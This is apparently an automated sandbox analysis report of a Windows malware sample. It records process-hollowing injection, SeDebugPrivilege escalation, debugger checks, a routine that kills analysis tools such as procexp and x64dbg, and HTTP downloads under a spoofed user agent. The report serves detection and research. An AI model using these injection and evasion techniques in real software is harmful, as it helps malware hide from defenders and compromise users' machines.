                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3992431006-2286007224
                                                                                                                                                                                                                          • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction ID: efc31e84b9e099eb75460d5479ab779079383af964e5f92e2f5bd2283e38feec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF11C520A1AA8685E722FF14F8443A9A7F2FB84744FC24135D54CD6AB5DF3CA4698B60

                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                          callgraph 0 Function_00007FF775AEA2D0 1 Function_00007FF775AE33CC 67 Function_00007FF775AE2048 1->67 2 Function_00007FF775AEC9CB 3 Function_00007FF775AE1FC8 4 Function_00007FF775AE38C4 68 Function_00007FF775AE3744 4->68 5 Function_00007FF775AE40C4 34 Function_00007FF775AE4004 5->34 6 Function_00007FF775AE45C4 69 Function_00007FF775AE4544 6->69 7 Function_00007FF775AED0C4 8 Function_00007FF775AEDEC1 9 Function_00007FF775AEDCC2 10 Function_00007FF775AEEBBE 11 Function_00007FF775AE2CB8 82 Function_00007FF775AE2A88 11->82 12 Function_00007FF775AED8B8 13 Function_00007FF775AE39B4 14 Function_00007FF775AE44B4 33 Function_00007FF775AE4404 14->33 15 Function_00007FF775AE33AC 15->67 16 Function_00007FF775AEBEAD 17 Function_00007FF775AE43A4 18 Function_00007FF775AE10A0 37 Function_00007FF775AE1000 18->37 64 Function_00007FF775AE1050 18->64 19 Function_00007FF775AE2F9C 19->4 19->5 53 Function_00007FF775AE46E4 19->53 55 Function_00007FF775AE40E4 19->55 101 Function_00007FF775AE3C64 19->101 20 Function_00007FF775AEE99B 21 Function_00007FF775AE359D 22 Function_00007FF775AEE999 23 Function_00007FF775AEE997 24 Function_00007FF775AE3F14 25 Function_00007FF775AE3714 26 Function_00007FF775AED615 27 Function_00007FF775AED915 28 Function_00007FF775AE2F0C 29 Function_00007FF775AE2008 30 Function_00007FF775AEE008 31 Function_00007FF775AEB508 32 Function_00007FF775AE3609 61 Function_00007FF775AE3B54 33->61 35 Function_00007FF775AED904 36 Function_00007FF775AEC501 38 Function_00007FF775AE36FC 39 Function_00007FF775AEABFB 40 Function_00007FF775AEC2F9 41 Function_00007FF775AEABF9 42 Function_00007FF775AEABF7 43 Function_00007FF775AEC2F7 44 Function_00007FF775AEC2F5 45 Function_00007FF775AEE8F3 46 Function_00007FF775AEB2F4 47 Function_00007FF775AEBCF1 48 
Function_00007FF775AEABF2 49 Function_00007FF775AE33EC 50 Function_00007FF775AE32EC 50->4 50->5 50->53 50->55 50->101 51 Function_00007FF775AE31EC 99 Function_00007FF775AE306C 51->99 52 Function_00007FF775AE36EC 93 Function_00007FF775AE4674 53->93 54 Function_00007FF775AE3CE4 55->11 56 Function_00007FF775AE1CDC 57 Function_00007FF775AE30DC 57->6 57->13 75 Function_00007FF775AE3C24 57->75 76 Function_00007FF775AE3E24 57->76 85 Function_00007FF775AE3B84 57->85 58 Function_00007FF775AEA0DD 59 Function_00007FF775AEB3DA 60 Function_00007FF775AEEFD8 62 Function_00007FF775AEDC55 63 Function_00007FF775AECD54 65 Function_00007FF775AEA052 66 Function_00007FF775AEA04E 67->3 67->29 83 Function_00007FF775AE1F88 67->83 68->25 70 Function_00007FF775AEDC46 71 Function_00007FF775AED33F 72 Function_00007FF775AED339 73 Function_00007FF775AEF232 74 Function_00007FF775AE3B24 77 Function_00007FF775AE321C 78 Function_00007FF775AED91D 79 Function_00007FF775AEC91A 80 Function_00007FF775AEEF92 81 Function_00007FF775AE338C 81->67 89 Function_00007FF775AE2978 82->89 84 Function_00007FF775AEA188 86 Function_00007FF775AEF281 87 Function_00007FF775AEA27F 88 Function_00007FF775AE327C 88->4 88->14 90 Function_00007FF775AEA778 91 Function_00007FF775AEF278 92 Function_00007FF775AE3A74 92->4 92->13 92->68 94 Function_00007FF775AEA776 95 Function_00007FF775AEC673 96 Function_00007FF775AEA772 97 Function_00007FF775AEDE70 98 Function_00007FF775AE2E6C 99->98 100 Function_00007FF775AE4264 100->61 100->74 102 Function_00007FF775AECF65 103 Function_00007FF775AED365 104 Function_00007FF775AEA061 105 Function_00007FF775AED361 106 Function_00007FF775AEB15F 107 Function_00007FF775AE345C 107->17 107->18 107->24 107->49 107->50 107->54 107->77 107->88 107->92 107->100 108 Function_00007FF775AEC65C 109 Function_00007FF775AEDE59 110 Function_00007FF775AEA05A 111 Function_00007FF775AEA258

                                                                                                                                                                                                                          [Control-flow graph figure: blocks marked as executed or not executed]
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
• Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                          • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                          • API String ID: 613740775-1953711635
                                                                                                                                                                                                                          • Opcode ID: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
                                                                                                                                                                                                                          • Instruction ID: e3c387f52a809feb3a1b1f2e06e0308ef8f6beb0458a909631aa4473b3dc2e82
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7611E22E3868791FB64B731A857E79AAA0BF84F01FC20536D54E865E1CE3DF8458630

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
• Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 434396405-0
                                                                                                                                                                                                                          • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction ID: c3f2313e7d5913dcea86ca0b22c611243dbc1afbf90629e8a265e2019f80e478
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B31F532A38A8286D750EB15E451B2EFBA4FBC4B80F515135FA8E47B68DF7CD4418B10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
• Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3920101602-0
                                                                                                                                                                                                                          • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction ID: a5148cca751d433061ade0b8329f4d1ecd290610e52eac05c6c62079e5a2c87c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07F03A22D3C28681EA706B6AA40676AAB90AFA5F08F810176D9CD06594CF2CE509DA21

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
• Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4294037311-0
                                                                                                                                                                                                                          • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction ID: da7283367b6e347ceaec0683e5fcdc910f264ff11ca6bb13f763834232a639b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86F03026D3CB83C2EA607B30B44677DAB64FF95B00F910435D98E42654CF3DD8099620

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 328 7ff775ae1050-7ff775ae108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
• Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2574300362-0
                                                                                                                                                                                                                          • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction ID: 43c7e2ffab496aba16f169902a993f432e235a1826f0741676c236efa12ac84a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E00276528F8586C621EB15F84511EBBB4FBC9B94F904125EACD42B28DF3CC665CB04

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 329 7ff775ae3b24-7ff775ae3b33 330 7ff775ae3b35-7ff775ae3b42 VirtualFree 329->330 331 7ff775ae3b48-7ff775ae3b4c 329->331 330->331
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
• Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 332 7ff775ae2048-7ff775ae20c2 GetModuleFileNameW 333 7ff775ae20c4 332->333 334 7ff775ae20c9-7ff775ae2105 332->334 337 7ff775ae296d-7ff775ae2975 333->337 335 7ff775ae211d-7ff775ae2139 call 7ff775ae1f88 334->335 336 7ff775ae2107-7ff775ae210f 334->336 346 7ff775ae217c-7ff775ae2186 335->346 338 7ff775ae2111-7ff775ae2119 336->338 339 7ff775ae213b-7ff775ae2157 call 7ff775ae1fc8 336->339 341 7ff775ae211b-7ff775ae2177 338->341 342 7ff775ae2159-7ff775ae2175 call 7ff775ae2008 338->342 339->346 341->337 342->346 350 7ff775ae218d-7ff775ae21e1 CreateProcessW 346->350 351 7ff775ae2188 346->351 352 7ff775ae21e3 350->352 353 7ff775ae21e8-7ff775ae2228 350->353 351->337 352->337 355 7ff775ae222f-7ff775ae224b GetFileSize 353->355 356 7ff775ae222a 353->356 357 7ff775ae224d-7ff775ae2255 355->357 358 7ff775ae2257-7ff775ae2262 CloseHandle 355->358 356->337 357->358 359 7ff775ae2267-7ff775ae228f VirtualAlloc 357->359 358->337 360 7ff775ae22a1-7ff775ae22cc ReadFile 359->360 361 7ff775ae2291-7ff775ae229c CloseHandle 359->361 362 7ff775ae22f1-7ff775ae233f CloseHandle GetThreadContext 360->362 363 7ff775ae22ce-7ff775ae22ec VirtualFree CloseHandle 360->363 361->337 364 7ff775ae2341-7ff775ae2354 VirtualFree 362->364 365 7ff775ae2359-7ff775ae23de ReadProcessMemory GetModuleHandleA GetProcAddress 362->365 363->337 364->337 367 7ff775ae23e0-7ff775ae23f3 VirtualFree 365->367 368 7ff775ae23f8-7ff775ae2461 VirtualAllocEx 365->368 367->337 369 7ff775ae2463-7ff775ae2476 VirtualFree 368->369 370 7ff775ae247b-7ff775ae24af WriteProcessMemory 368->370 369->337 371 7ff775ae24b1-7ff775ae24c4 VirtualFree 370->371 372 7ff775ae24c9-7ff775ae24d4 370->372 371->337 373 7ff775ae24e6-7ff775ae24f9 372->373 374 7ff775ae24ff-7ff775ae2588 WriteProcessMemory 373->374 375 
7ff775ae25a7-7ff775ae25ee 373->375 376 7ff775ae25a2 374->376 377 7ff775ae258a-7ff775ae259d VirtualFree 374->377 378 7ff775ae2600-7ff775ae2613 375->378 376->373 377->337 380 7ff775ae2898-7ff775ae291c WriteProcessMemory SetThreadContext 378->380 381 7ff775ae2619-7ff775ae2668 RtlCompareMemory 378->381 382 7ff775ae2933-7ff775ae2943 ResumeThread 380->382 383 7ff775ae291e-7ff775ae2931 VirtualFree 380->383 384 7ff775ae266c-7ff775ae2695 381->384 385 7ff775ae266a 381->385 387 7ff775ae2945-7ff775ae2958 VirtualFree 382->387 388 7ff775ae295a-7ff775ae2967 VirtualFree 382->388 383->337 389 7ff775ae26a0-7ff775ae26ae 384->389 385->378 387->337 388->337 390 7ff775ae26b4-7ff775ae273f 389->390 391 7ff775ae2893 389->391 392 7ff775ae2751-7ff775ae275f 390->392 391->380 393 7ff775ae2765-7ff775ae2798 392->393 394 7ff775ae288e 392->394 395 7ff775ae279c-7ff775ae286f ReadProcessMemory WriteProcessMemory 393->395 396 7ff775ae279a 393->396 394->389 398 7ff775ae2871-7ff775ae2884 VirtualFree 395->398 399 7ff775ae2889 395->399 396->392 398->337 399->394
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 4073123320-2766056989

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF775AE1D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateCloseFileHandleProcessSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1391523307-0
                                                                                                                                                                                                                          • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction ID: bab05592642ebe82a8c1224be10badd231f107d7a6ee952211606a640b57c64d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68811032A2CB8182EB50DB55F45576AFBA0FBC9B91F514135EA8D83B68DF7CD0448B10

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3117), ref: 00007FF775AE4654
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF775AE3C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF775AE3E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: Process32FirstW.KERNEL32 ref: 00007FF775AE3E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: CloseHandle.KERNEL32 ref: 00007FF775AE3E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: wcscmp.MSVCRT ref: 00007FF775AE3E91
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: OpenProcess.KERNEL32 ref: 00007FF775AE3EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: TerminateProcess.KERNEL32 ref: 00007FF775AE3ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: CloseHandle.KERNEL32 ref: 00007FF775AE3ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: Process32NextW.KERNEL32 ref: 00007FF775AE3EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: CloseHandle.KERNEL32 ref: 00007FF775AE3EFD
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF775AE31C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$ProcessProcess32$CreateDeleteFirstNextOpenSleepSnapshotTerminateToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 4011447834-928700279
                                                                                                                                                                                                                          • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction ID: 2caf934d57991e357965e2cd628a4cd7f7cae6f789fee521f92e16a3dadb3a17
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C215822E3858791EA04FB24E8539B9EFA0AF50F54FD24532E51E431E6DF2CF9098630

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185
                                                                                                                                                                                                                          • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction ID: 99e866ab0a930e69ecbe2d85e58fa55037c996f308919bc648d1e67fe338a28c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D901E923A3CA9281E730AB11F856679AF60FF88F98F850135E94E42A74CF3CD9858610

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF775AE3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3744: GetVolumeInformationW.KERNEL32 ref: 00007FF775AE3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3744: wsprintfW.USER32 ref: 00007FF775AE38A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3945
